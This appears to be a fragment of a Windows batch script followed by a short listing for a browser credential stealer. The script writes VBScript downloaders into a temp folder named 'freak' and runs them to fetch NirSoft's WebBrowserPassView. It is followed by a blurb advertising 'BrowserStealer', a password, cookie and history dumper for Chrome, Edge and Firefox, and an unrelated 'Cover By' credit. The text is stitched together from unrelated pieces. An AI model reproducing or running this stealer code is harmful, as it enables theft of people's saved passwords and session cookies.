echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\opera.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\opera.vbs
echo objXMLHTTP.send() >> %temp%\freak\opera.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\opera.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\opera.vbs
echo objADOStream.Open >> %temp%\freak\opera.vbs
echo objADOStream.Type = 1 >> %temp%\freak\opera.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\opera.vbs
echo objADOStream.Position = 0 >> %temp%\freak\opera.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\opera.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\opera.vbs
echo Set objFSO = Nothing >> %temp%\freak\opera.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\opera.vbs
echo objADOStream.Close >> %temp%\freak\opera.vbs
echo Set objADOStream = Nothing >> %temp%\freak\opera.vbs
echo End if >> %temp%\freak\opera.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\opera.vbs
call %temp%\freak\opera.vbs

::Download All::
echo strFileURL = "http://nirsoft.net/utils/webbrowserpassview.zip" > %temp%\freak\all.vbs
echo strHDLocation = "%temp%\freak\webbrowserpassview.zip" >> %temp%\freak\all.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\all.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\all.vbs
echo objXMLHTTP.send() >> %temp%\freak\all.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\all.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\all.vbs
echo objADOStream.Open >> %temp%\freak\all.vbs
echo objADOStream.Type = 1 >> %temp%\freak\all.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\all.vbs
echo objADOStream.Position = 0 >> %temp%\freak\all.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\all.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\all.vbs
echo Set objFSO = Nothing >> %temp%\freak\all.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\all.vbs
echo objADOStream.Close >> %temp%\freak\all.vbs
echo Set objADOStream = Nothing >> %temp%\freak\all.vbs
echo End if >> %temp%\freak\all.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\all.vbs
call %temp%\freak\all.vbs

BrowserStealer

github.com/SaulBerrenson/BrowserStealer

Simple password/cookies/history/bookmarks stealer/dumper for all versions of Chrome (including 80+), Microsoft Edge, all Chromium-based browsers, and all Gecko-based browsers (Firefox etc.).

BrowserCollector.exe

Cover By Victoria Trach